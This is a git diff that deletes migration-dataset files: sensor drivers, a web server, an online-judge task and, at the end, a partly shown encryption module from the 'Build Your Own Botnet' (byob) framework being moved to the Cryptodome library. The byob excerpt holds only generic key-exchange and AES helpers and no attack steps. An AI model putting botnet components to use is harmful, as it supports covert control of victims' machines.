conditions: -# -# The above copyright notice and this permission notice shall be -# included in all copies or substantial portions of the Software. 
- -import fasteners -import logging -import serial -import smbus -import struct -import time -from .base_sensor import AbstractSensor - -from sensorutils import is_device - - -class MHZ16Sensor(AbstractSensor): - """ A sensor support class that monitors the MH-Z16's CO2 concentration """ - - def __init__(self, interface, device_loc=None, baud_rate=None, - i2c_address=None, i2c_bus=None): - super(MHZ16Sensor, self).__init__() - self.mhz16_lock_file = None - self._co2 = 0 - self.interface = interface - - if self.interface == 'UART': - self.logger = logging.getLogger( - "mycodo.sensors.mhz16.{dev}".format(dev=device_loc.replace('/', ''))) - # Check if device is valid - self.serial_device = is_device(device_loc) - if self.serial_device: - try: - self.mhz16_lock_file = "/var/lock/sen-mhz16-{}".format(device_loc.replace('/', '')) - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) - except serial.SerialException: - self.logger.exception('Opening serial') - else: - self.logger.error( - 'Could not open "{dev}". ' - 'Check the device location is correct.'.format( - dev=device_loc)) - - elif self.interface == 'I2C': - self.logger = logging.getLogger( - "mycodo.sensors.mhz16.{dev}".format(dev=i2c_address)) - self.cmd_measure = [0xFF, 0x01, 0x9C, 0x00, 0x00, 0x00, 0x00, 0x00, 0x63] - self.IOCONTROL = 0X0E << 3 - self.FCR = 0X02 << 3 - self.LCR = 0X03 << 3 - self.DLL = 0x00 << 3 - self.DLH = 0X01 << 3 - self.THR = 0X00 << 3 - self.RHR = 0x00 << 3 - self.TXLVL = 0X08 << 3 - self.RXLVL = 0X09 << 3 - self.i2c_address = i2c_address - self.i2c = smbus.SMBus(i2c_bus) - self.begin() - - def __repr__(self): - """ Representation of object """ - return "<{cls}(co2={co2})>".format( - cls=type(self).__name__, - co2="{0:.2f}".format(self._co2)) - - def __str__(self): - """ Return CO2 information """ - return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2)) - - def __iter__(self): # must return an iterator - """ MH-Z16 iterates through live CO2 readings """ - return self - - def next(self): - """ Get next CO2 reading """ - if self.read(): # raised an error - raise StopIteration # required - return dict(co2=float('{0:.2f}'.format(self._co2))) - - def info(self): - conditions_measured = [ - ("CO2", "co2", "float", "0.00", self._co2, self.co2) - ] - return conditions_measured - - @property - def co2(self): - """ CO2 concentration in ppmv """ - if not self._co2: # update if needed - self.read() - return self._co2 - - def get_measurement(self): - """ Gets the MH-Z16's CO2 concentration in ppmv via UART""" - self._co2 = None - - if self.interface == 'UART': - self.ser.flushInput() - time.sleep(1) - self.ser.write("\xff\x01\x86\x00\x00\x00\x00\x00\x79") - time.sleep(.01) - resp = self.ser.read(9) - if len(resp) != 0: - high_level = struct.unpack('B', resp[2])[0] - low_level = struct.unpack('B', resp[3])[0] - co2 = high_level * 256 + low_level - return co2 - - elif self.interface == 'I2C': - self.write_register(self.FCR, 0x07) - self.send(self.cmd_measure) - try: - co2 = self.parse(self.receive()) - except Exception: - co2 = None - return co2 - - return None - - def read(self): - """ - Takes a reading from the MH-Z16 and updates the self._co2 value - - :returns: None on success or 1 on error - """ - try: - if self.interface == 'UART': - if not self.serial_device: # Don't measure if device isn't validated - return None - - # Acquire lock on MHZ16 to ensure more than one read isn't - # being attempted at once on the same interface - lock = fasteners.InterProcessLock(self.mhz16_lock_file) - 
lock_acquired = False - - for i in range(600): - lock_acquired = lock.acquire(blocking=False) - if lock_acquired: - break - else: - time.sleep(0.1) - - if lock_acquired: - self._co2 = self.get_measurement() - lock.release() - else: - self.logger.error("Could not acquire MHZ16 lock") - - elif self.interface == 'I2C': - self._co2 = self.get_measurement() - - if self._co2 is None: - return 1 - return # success - no errors - - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) - return 1 - - def begin(self): - try: - self.write_register(self.IOCONTROL, 0x08) - except IOError: - pass - - self.write_register(self.FCR, 0x07) - self.write_register(self.LCR, 0x83) - self.write_register(self.DLL, 0x60) - self.write_register(self.DLH, 0x00) - self.write_register(self.LCR, 0x03) - - @staticmethod - def parse(response): - checksum = 0 - - if len(response) < 9: - return None - - for i in range(0, 9): - checksum += response[i] - - if response[0] == 0xFF: - if response[1] == 0x9C: - if checksum % 256 == 0xFF: - return (response[2] << 24) + (response[3] << 16) + (response[4] << 8) + response[5] - - return None - - def read_register(self, reg_addr): - time.sleep(0.01) - return self.i2c.read_byte_data(self.i2c_address, reg_addr) - - def write_register(self, reg_addr, val): - time.sleep(0.01) - self.i2c.write_byte_data(self.i2c_address, reg_addr, val) - - def send(self, command): - if self.read_register(self.TXLVL) >= len(command): - self.i2c.write_i2c_block_data(self.i2c_address, self.THR, command) - - def receive(self): - n = 9 - buf = [] - start = time.clock() - - while n > 0: - rx_level = self.read_register(self.RXLVL) - - if rx_level > n: - rx_level = n - - buf.extend(self.i2c.read_i2c_block_data(self.i2c_address, self.RHR, rx_level)) - n = n - rx_level - - if time.clock() - start > 0.2: - break - return buf \ No newline at end of file diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.diff b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.diff deleted file mode 100644 index ff87b9f..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.diff +++ /dev/null @@ -1,75 +0,0 @@ -diff --git a/mycodo/sensors/mh_z19.py b/mycodo/sensors/mh_z19.py - index a193e1e85f246694defb54c3cfe3ea658368ac3c..547f6d9f22e569007c1066e36ee5142f5e1b533d 100644 - --- a/mycodo/sensors/mh_z19.py - +++ b/mycodo/sensors/mh_z19.py -@@ -1,6 +1,6 @@ - # coding=utf-8 - --from lockfile import LockFile -+import fasteners - import logging - import serial - import time -@@ -16,7 +16,7 @@ class MHZ19Sensor(AbstractSensor): - super(MHZ19Sensor, self).__init__() - self.logger = logging.getLogger( - "mycodo.sensors.mhz19.{dev}".format(dev=device_loc.replace('/', ''))) -- self.k30_lock_file = None -+ self.mhz19_lock_file = None - self._co2 = 0 - - # Check if device is valid -@@ -26,7 +26,7 @@ class MHZ19Sensor(AbstractSensor): - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) -- self.k30_lock_file = "/var/lock/sen-mhz19-{}".format(device_loc.replace('/', '')) -+ self.mhz19_lock_file = "/var/lock/sen-mhz19-{}".format(device_loc.replace('/', '')) - except serial.SerialException: - self.logger.exception('Opening serial') - else: -@@ -92,27 +92,29 @@ class MHZ19Sensor(AbstractSensor): - if not self.serial_device: # Don't measure if device isn't validated - return None - -- lock = LockFile(self.k30_lock_file) - try: - # Acquire lock on MHZ19 to ensure 
more than one read isn't - # being attempted at once. -- while not lock.i_am_locking(): -- try: # wait 60 seconds before breaking lock -- lock.acquire(timeout=60) -- except Exception as e: -- self.logger.error( -- "{cls} 60 second timeout, {lock} lock broken: " -- "{err}".format( -- cls=type(self).__name__, -- lock=self.k30_lock_file, -- err=e)) -- lock.break_lock() -- lock.acquire() -- self._co2 = self.get_measurement() -- lock.release() -+ lock = fasteners.InterProcessLock(self.mhz19_lock_file) -+ lock_acquired = False -+ -+ for i in range(600): -+ lock_acquired = lock.acquire(blocking=False) -+ if lock_acquired: -+ break -+ else: -+ time.sleep(0.1) -+ -+ if lock_acquired: -+ self._co2 = self.get_measurement() -+ lock.release() -+ else: -+ self.logger.error("Could not acquire MHZ19 lock") -+ - if self._co2 is None: - return 1 - return # success - no errors -+ - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.source.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.source.py deleted file mode 100644 index 2176b4e..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.source.py +++ /dev/null @@ -1,121 +0,0 @@ -# coding=utf-8 - -from lockfile import LockFile -import logging -import serial -import time -from .base_sensor import AbstractSensor - -from sensorutils import is_device - - -class MHZ19Sensor(AbstractSensor): - """ A sensor support class that monitors the MH-Z19's CO2 concentration """ - - def __init__(self, device_loc, baud_rate=9600): - super(MHZ19Sensor, self).__init__() - self.logger = logging.getLogger( - "mycodo.sensors.mhz19.{dev}".format(dev=device_loc.replace('/', ''))) - self.k30_lock_file = None - self._co2 = 0 - - # Check if device is valid - self.serial_device = is_device(device_loc) - if self.serial_device: - try: - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) - self.k30_lock_file = "/var/lock/sen-mhz19-{}".format(device_loc.replace('/', '')) - except serial.SerialException: - self.logger.exception('Opening serial') - else: - self.logger.error( - 'Could not open "{dev}". 
' - 'Check the device location is correct.'.format( - dev=device_loc)) - - def __repr__(self): - """ Representation of object """ - return "<{cls}(co2={co2})>".format( - cls=type(self).__name__, - co2="{0:.2f}".format(self._co2)) - - def __str__(self): - """ Return CO2 information """ - return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2)) - - def __iter__(self): # must return an iterator - """ MH-Z19 iterates through live CO2 readings """ - return self - - def next(self): - """ Get next CO2 reading """ - if self.read(): # raised an error - raise StopIteration # required - return dict(co2=float('{0:.2f}'.format(self._co2))) - - def info(self): - conditions_measured = [ - ("CO2", "co2", "float", "0.00", self._co2, self.co2) - ] - return conditions_measured - - @property - def co2(self): - """ CO2 concentration in ppmv """ - if not self._co2: # update if needed - self.read() - return self._co2 - - def get_measurement(self): - """ Gets the MH-Z19's CO2 concentration in ppmv via UART""" - self._co2 = None - self.ser.flushInput() - time.sleep(1) - self.ser.write("\xff\x01\x86\x00\x00\x00\x00\x00\x79") - time.sleep(.01) - resp = self.ser.read(9) - if len(resp) != 0: - high = ord(resp[2]) - low = ord(resp[3]) - co2 = (high * 256) + low - return co2 - return None - - def read(self): - """ - Takes a reading from the MH-Z19 and updates the self._co2 value - - :returns: None on success or 1 on error - """ - if not self.serial_device: # Don't measure if device isn't validated - return None - - lock = LockFile(self.k30_lock_file) - try: - # Acquire lock on MHZ19 to ensure more than one read isn't - # being attempted at once. - while not lock.i_am_locking(): - try: # wait 60 seconds before breaking lock - lock.acquire(timeout=60) - except Exception as e: - self.logger.error( - "{cls} 60 second timeout, {lock} lock broken: " - "{err}".format( - cls=type(self).__name__, - lock=self.k30_lock_file, - err=e)) - lock.break_lock() - lock.acquire() - self._co2 = self.get_measurement() - lock.release() - if self._co2 is None: - return 1 - return # success - no errors - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) - lock.release() - return 1 diff --git a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.target.py b/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.target.py deleted file mode 100644 index cb747f2..0000000 --- a/v1/data/codefile/kizniche@mycodo__547f6d9__mycodo$sensors$mh_z19.py.target.py +++ /dev/null @@ -1,123 +0,0 @@ -# coding=utf-8 - -import fasteners -import logging -import serial -import time -from .base_sensor import AbstractSensor - -from sensorutils import is_device - - -class MHZ19Sensor(AbstractSensor): - """ A sensor support class that monitors the MH-Z19's CO2 concentration """ - - def __init__(self, device_loc, baud_rate=9600): - super(MHZ19Sensor, self).__init__() - self.logger = logging.getLogger( - "mycodo.sensors.mhz19.{dev}".format(dev=device_loc.replace('/', ''))) - self.mhz19_lock_file = None - self._co2 = 0 - - # Check if device is valid - self.serial_device = is_device(device_loc) - if self.serial_device: - try: - self.ser = serial.Serial(self.serial_device, - baudrate=baud_rate, - timeout=1) - self.mhz19_lock_file = "/var/lock/sen-mhz19-{}".format(device_loc.replace('/', '')) - except serial.SerialException: - self.logger.exception('Opening serial') - else: - self.logger.error( - 'Could not open "{dev}". 
' - 'Check the device location is correct.'.format( - dev=device_loc)) - - def __repr__(self): - """ Representation of object """ - return "<{cls}(co2={co2})>".format( - cls=type(self).__name__, - co2="{0:.2f}".format(self._co2)) - - def __str__(self): - """ Return CO2 information """ - return "CO2: {co2}".format(co2="{0:.2f}".format(self._co2)) - - def __iter__(self): # must return an iterator - """ MH-Z19 iterates through live CO2 readings """ - return self - - def next(self): - """ Get next CO2 reading """ - if self.read(): # raised an error - raise StopIteration # required - return dict(co2=float('{0:.2f}'.format(self._co2))) - - def info(self): - conditions_measured = [ - ("CO2", "co2", "float", "0.00", self._co2, self.co2) - ] - return conditions_measured - - @property - def co2(self): - """ CO2 concentration in ppmv """ - if not self._co2: # update if needed - self.read() - return self._co2 - - def get_measurement(self): - """ Gets the MH-Z19's CO2 concentration in ppmv via UART""" - self._co2 = None - self.ser.flushInput() - time.sleep(1) - self.ser.write("\xff\x01\x86\x00\x00\x00\x00\x00\x79") - time.sleep(.01) - resp = self.ser.read(9) - if len(resp) != 0: - high = ord(resp[2]) - low = ord(resp[3]) - co2 = (high * 256) + low - return co2 - return None - - def read(self): - """ - Takes a reading from the MH-Z19 and updates the self._co2 value - - :returns: None on success or 1 on error - """ - if not self.serial_device: # Don't measure if device isn't validated - return None - - try: - # Acquire lock on MHZ19 to ensure more than one read isn't - # being attempted at once. - lock = fasteners.InterProcessLock(self.mhz19_lock_file) - lock_acquired = False - - for i in range(600): - lock_acquired = lock.acquire(blocking=False) - if lock_acquired: - break - else: - time.sleep(0.1) - - if lock_acquired: - self._co2 = self.get_measurement() - lock.release() - else: - self.logger.error("Could not acquire MHZ19 lock") - - if self._co2 is None: - return 1 - return # success - no errors - - except Exception as e: - self.logger.error( - "{cls} raised an exception when taking a reading: " - "{err}".format(cls=type(self).__name__, err=e)) - lock.release() - return 1 diff --git a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.diff b/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.diff deleted file mode 100644 index 2b3f1d2..0000000 --- a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.diff +++ /dev/null @@ -1,37 +0,0 @@ -diff --git a/microservices/projection_image/server.py b/microservices/projection_image/server.py - index d302125613445f5fa55545c427c74bcbc5773722..db7f1321e13b5386f94670537aa49943f0f0cec9 100644 - --- a/microservices/projection_image/server.py - +++ b/microservices/projection_image/server.py -@@ -1,4 +1,4 @@ --from flask import jsonify, request, Flask -+from quart import jsonify, request, Quart - import os - from projection import SparkManager, MongoOperations, \ - ProjectionRequestValidator -@@ -30,7 +30,7 @@ MESSAGE_CREATED_FILE = "created_file" - - FIRST_ARGUMENT = 0 - --app = Flask(__name__) -+app = Quart(__name__) - - - def collection_database_url( -@@ -49,7 +49,7 @@ def collection_database_url( - - - @app.route("/projections", methods=[POST]) --def create_projection(): -+async def create_projection(): - database = MongoOperations( - os.environ[DATABASE_URL] + "/?replicaSet=" + os.environ[ - 
DATABASE_REPLICA_SET], -@@ -109,7 +109,7 @@ def create_projection(): - - projection_fields.append(DOCUMENT_ID) - -- spark_manager.projection( -+ await spark_manager.projection( - parent_filename, request.json[PROJECTION_FILENAME_NAME], - projection_fields - ) diff --git a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.source.py b/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.source.py deleted file mode 100644 index e444a5b..0000000 --- a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.source.py +++ /dev/null @@ -1,127 +0,0 @@ -from flask import jsonify, request, Flask -import os -from projection import SparkManager, MongoOperations, \ - ProjectionRequestValidator - -HTTP_STATUS_CODE_SUCESS_CREATED = 201 -HTTP_STATUS_CODE_CONFLICT = 409 -HTTP_STATUS_CODE_NOT_ACCEPTABLE = 406 - -PROJECTION_HOST_IP = "PROJECTION_HOST_IP" -PROJECTION_HOST_PORT = "PROJECTION_HOST_PORT" - -DATABASE_URL = "DATABASE_URL" -DATABASE_PORT = "DATABASE_PORT" -DATABASE_NAME = "DATABASE_NAME" -DATABASE_REPLICA_SET = "DATABASE_REPLICA_SET" - -DOCUMENT_ID = "_id" -METADATA_DOCUMENT_ID = 0 - -GET = "GET" -POST = "POST" -DELETE = "DELETE" - -MESSAGE_RESULT = "result" -PROJECTION_FILENAME_NAME = "output_filename" -FIELDS_NAME = "fields" - -MESSAGE_CREATED_FILE = "created_file" - -FIRST_ARGUMENT = 0 - -app = Flask(__name__) - - -def collection_database_url( - database_url, database_name, database_filename, database_replica_set -): - return ( - database_url - + "/" - + database_name - + "." - + database_filename - + "?replicaSet=" - + database_replica_set - + "&authSource=admin" - ) - - -@app.route("/projections", methods=[POST]) -def create_projection(): - database = MongoOperations( - os.environ[DATABASE_URL] + "/?replicaSet=" + os.environ[ - DATABASE_REPLICA_SET], - os.environ[DATABASE_PORT], - os.environ[DATABASE_NAME], - ) - - request_validator = ProjectionRequestValidator(database) - - try: - request_validator.projection_filename_validator( - request.json[PROJECTION_FILENAME_NAME] - ) - except Exception as invalid_projection_filename: - return ( - jsonify({MESSAGE_RESULT: invalid_projection_filename.args[ - FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_CONFLICT, - ) - - try: - parent_filename = request.json["input_filename"] - request_validator.filename_validator(parent_filename) - except Exception as invalid_filename: - return ( - jsonify({MESSAGE_RESULT: invalid_filename.args[FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_NOT_ACCEPTABLE, - ) - - try: - request_validator.projection_fields_validator( - parent_filename, request.json[FIELDS_NAME] - ) - except Exception as invalid_fields: - return ( - jsonify({MESSAGE_RESULT: invalid_fields.args[FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_NOT_ACCEPTABLE, - ) - - database_url_input = collection_database_url( - os.environ[DATABASE_URL], - os.environ[DATABASE_NAME], - parent_filename, - os.environ[DATABASE_REPLICA_SET], - ) - - database_url_output = collection_database_url( - os.environ[DATABASE_URL], - os.environ[DATABASE_NAME], - request.json[PROJECTION_FILENAME_NAME], - os.environ[DATABASE_REPLICA_SET], - ) - - spark_manager = SparkManager(database_url_input, database_url_output) - - projection_fields = request.json[FIELDS_NAME] - - projection_fields.append(DOCUMENT_ID) - - spark_manager.projection( - parent_filename, request.json[PROJECTION_FILENAME_NAME], - projection_fields - ) - - return ( - jsonify({MESSAGE_RESULT: 
MESSAGE_CREATED_FILE}), - HTTP_STATUS_CODE_SUCESS_CREATED, - ) - - -if __name__ == "__main__": - app.run( - host=os.environ[PROJECTION_HOST_IP], - port=int(os.environ[PROJECTION_HOST_PORT]) - ) diff --git a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.target.py b/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.target.py deleted file mode 100644 index 6d4a237..0000000 --- a/v1/data/codefile/learningorchestra@learningorchestra__db7f132__microservices$projection_image$server.py.target.py +++ /dev/null @@ -1,127 +0,0 @@ -from quart import jsonify, request, Quart -import os -from projection import SparkManager, MongoOperations, \ - ProjectionRequestValidator - -HTTP_STATUS_CODE_SUCESS_CREATED = 201 -HTTP_STATUS_CODE_CONFLICT = 409 -HTTP_STATUS_CODE_NOT_ACCEPTABLE = 406 - -PROJECTION_HOST_IP = "PROJECTION_HOST_IP" -PROJECTION_HOST_PORT = "PROJECTION_HOST_PORT" - -DATABASE_URL = "DATABASE_URL" -DATABASE_PORT = "DATABASE_PORT" -DATABASE_NAME = "DATABASE_NAME" -DATABASE_REPLICA_SET = "DATABASE_REPLICA_SET" - -DOCUMENT_ID = "_id" -METADATA_DOCUMENT_ID = 0 - -GET = "GET" -POST = "POST" -DELETE = "DELETE" - -MESSAGE_RESULT = "result" -PROJECTION_FILENAME_NAME = "output_filename" -FIELDS_NAME = "fields" - -MESSAGE_CREATED_FILE = "created_file" - -FIRST_ARGUMENT = 0 - -app = Quart(__name__) - - -def collection_database_url( - database_url, database_name, database_filename, database_replica_set -): - return ( - database_url - + "/" - + database_name - + "." - + database_filename - + "?replicaSet=" - + database_replica_set - + "&authSource=admin" - ) - - -@app.route("/projections", methods=[POST]) -async def create_projection(): - database = MongoOperations( - os.environ[DATABASE_URL] + "/?replicaSet=" + os.environ[ - DATABASE_REPLICA_SET], - os.environ[DATABASE_PORT], - os.environ[DATABASE_NAME], - ) - - request_validator = ProjectionRequestValidator(database) - - try: - request_validator.projection_filename_validator( - request.json[PROJECTION_FILENAME_NAME] - ) - except Exception as invalid_projection_filename: - return ( - jsonify({MESSAGE_RESULT: invalid_projection_filename.args[ - FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_CONFLICT, - ) - - try: - parent_filename = request.json["input_filename"] - request_validator.filename_validator(parent_filename) - except Exception as invalid_filename: - return ( - jsonify({MESSAGE_RESULT: invalid_filename.args[FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_NOT_ACCEPTABLE, - ) - - try: - request_validator.projection_fields_validator( - parent_filename, request.json[FIELDS_NAME] - ) - except Exception as invalid_fields: - return ( - jsonify({MESSAGE_RESULT: invalid_fields.args[FIRST_ARGUMENT]}), - HTTP_STATUS_CODE_NOT_ACCEPTABLE, - ) - - database_url_input = collection_database_url( - os.environ[DATABASE_URL], - os.environ[DATABASE_NAME], - parent_filename, - os.environ[DATABASE_REPLICA_SET], - ) - - database_url_output = collection_database_url( - os.environ[DATABASE_URL], - os.environ[DATABASE_NAME], - request.json[PROJECTION_FILENAME_NAME], - os.environ[DATABASE_REPLICA_SET], - ) - - spark_manager = SparkManager(database_url_input, database_url_output) - - projection_fields = request.json[FIELDS_NAME] - - projection_fields.append(DOCUMENT_ID) - - await spark_manager.projection( - parent_filename, request.json[PROJECTION_FILENAME_NAME], - projection_fields - ) - - return ( - jsonify({MESSAGE_RESULT: MESSAGE_CREATED_FILE}), - HTTP_STATUS_CODE_SUCESS_CREATED, - ) 
- - -if __name__ == "__main__": - app.run( - host=os.environ[PROJECTION_HOST_IP], - port=int(os.environ[PROJECTION_HOST_PORT]) - ) diff --git a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.diff b/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.diff deleted file mode 100644 index 0099026..0000000 --- a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.diff +++ /dev/null @@ -1,21 +0,0 @@ -diff --git a/submission/tasks.py b/submission/tasks.py - index 84d390362bafc8a369cfa917b6ed43eabaddb610..b687d2067b28f6759a47ddcfe7bb575e8f83f679 100644 - --- a/submission/tasks.py - +++ b/submission/tasks.py -@@ -1,9 +1,9 @@ - # coding=utf-8 --from huey.djhuey import db_task -- -+from __future__ import absolute_import -+from celery import shared_task - from judge_dispatcher.tasks import JudgeDispatcher - - --@db_task() --def _judge(submission, time_limit, memory_limit, test_case_id, is_waiting_task=False): -- JudgeDispatcher(submission, time_limit, memory_limit, test_case_id).judge(is_waiting_task) -\ No newline at end of file -+@shared_task -+def _judge(submission, time_limit, memory_limit, test_case_id): -+ JudgeDispatcher(submission, time_limit, memory_limit, test_case_id).judge() -\ No newline at end of file diff --git a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.source.py b/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.source.py deleted file mode 100644 index 0e958e7..0000000 --- a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.source.py +++ /dev/null @@ -1,9 +0,0 @@ -# coding=utf-8 -from huey.djhuey import db_task - -from judge_dispatcher.tasks import JudgeDispatcher - - -@db_task() -def _judge(submission, time_limit, memory_limit, test_case_id, is_waiting_task=False): - JudgeDispatcher(submission, time_limit, memory_limit, test_case_id).judge(is_waiting_task) \ No newline at end of file diff --git a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.target.py b/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.target.py deleted file mode 100644 index 4267841..0000000 --- a/v1/data/codefile/lonelam@onlinejudgeshu__b687d20__submission$tasks.py.target.py +++ /dev/null @@ -1,9 +0,0 @@ -# coding=utf-8 -from __future__ import absolute_import -from celery import shared_task -from judge_dispatcher.tasks import JudgeDispatcher - - -@shared_task -def _judge(submission, time_limit, memory_limit, test_case_id): - JudgeDispatcher(submission, time_limit, memory_limit, test_case_id).judge() \ No newline at end of file diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.diff b/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.diff deleted file mode 100644 index d8bf3cf..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.diff +++ /dev/null @@ -1,56 +0,0 @@ -diff --git a/byob/core/security.py b/byob/core/security.py - index e7d21501055ea9db3d37f5a96059534b29bdbe2d..9291b54ed6a1c727030c571a6ebdf7b344781c8f 100644 - --- a/byob/core/security.py - +++ b/byob/core/security.py -@@ -17,10 +17,10 @@ import StringIO - - # packages - try: -- import Crypto.Util.number -- import Crypto.Cipher.AES -- import Crypto.Hash.HMAC -- import Crypto.Hash.SHA256 -+ import Cryptodome.Util.number -+ import Cryptodome.Cipher.AES -+ import Cryptodome.Hash.HMAC -+ import Cryptodome.Hash.SHA256 - except ImportError: - pass - -@@ -38,12 +38,12 @@ def diffiehellman(connection): - if 
isinstance(connection, socket.socket): - g = 2 - p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF -- a = Crypto.Util.number.bytes_to_long(os.urandom(32)) -+ a = Cryptodome.Util.number.bytes_to_long(os.urandom(32)) - xA = pow(g, a, p) -- connection.send(Crypto.Util.number.long_to_bytes(xA)) -- xB = Crypto.Util.number.bytes_to_long(connection.recv(256)) -+ connection.send(Cryptodome.Util.number.long_to_bytes(xA)) -+ xB = Cryptodome.Util.number.bytes_to_long(connection.recv(256)) - x = pow(xB, a, p) -- return Crypto.Hash.SHA256.new(Crypto.Util.number.long_to_bytes(x)).digest() -+ return Cryptodome.Hash.SHA256.new(Cryptodome.Util.number.long_to_bytes(x)).digest() - else: - raise TypeError("argument 'connection' must be type '{}'".format(socket.socket)) - -@@ -61,7 +61,7 @@ def encrypt_aes(plaintext, key, padding=chr(0)): - Returns encrypted ciphertext as base64-encoded string - - """ -- cipher = Crypto.Cipher.AES.new(key, Crypto.Cipher.AES.MODE_OCB) -+ cipher = Cryptodome.Cipher.AES.new(key, Cryptodome.Cipher.AES.MODE_OCB) - ciphertext, tag = cipher.encrypt_and_digest(plaintext) - output = b''.join((cipher.nonce, tag, ciphertext)) - return base64.b64encode(output) -@@ -81,8 +81,8 @@ def decrypt_aes(ciphertext, key, padding=chr(0)): - - """ - data = StringIO.StringIO(base64.b64decode(ciphertext)) -- nonce, tag, ciphertext = [ data.read(x) for x in (Crypto.Cipher.AES.block_size - 1, Crypto.Cipher.AES.block_size, -1) ] -- cipher = Crypto.Cipher.AES.new(key, Crypto.Cipher.AES.MODE_OCB, nonce) -+ nonce, tag, ciphertext = [ data.read(x) for x in (Cryptodome.Cipher.AES.block_size - 1, Cryptodome.Cipher.AES.block_size, -1) ] -+ cipher = Cryptodome.Cipher.AES.new(key, Cryptodome.Cipher.AES.MODE_OCB, nonce) - return cipher.decrypt_and_verify(ciphertext, tag) - - def encrypt_xor(data, key, block_size=8, key_size=16, num_rounds=32, padding=chr(0)): diff --git a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.source.py b/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.source.py deleted file mode 100644 index 2b3ed41..0000000 --- a/v1/data/codefile/malwaredllc@byob__9291b54__byob$core$security.py.source.py +++ /dev/null @@ -1,157 +0,0 @@ -#!/usr/bin/python -# -*- coding: utf-8 -*- -'Security (Build Your Own Botnet)' - -# standard library -import os -import sys -import imp -import json -import struct -import base64 -import socket -import urllib -import logging -import tempfile -import StringIO - -# packages -try: - import Crypto.Util.number - import Crypto.Cipher.AES - import Crypto.Hash.HMAC - import Crypto.Hash.SHA256 -except ImportError: - pass - -# main -def diffiehellman(connection): - """ - Diffie-Hellman Internet Key Exchange (RFC 2741) - - `Requires` - :param socket connection: socket.socket object - - Returns the 256-bit binary digest of the SHA256 hash - of the shared session encryption key - """ - if isinstance(connection, socket.socket): - g = 2 - p = 
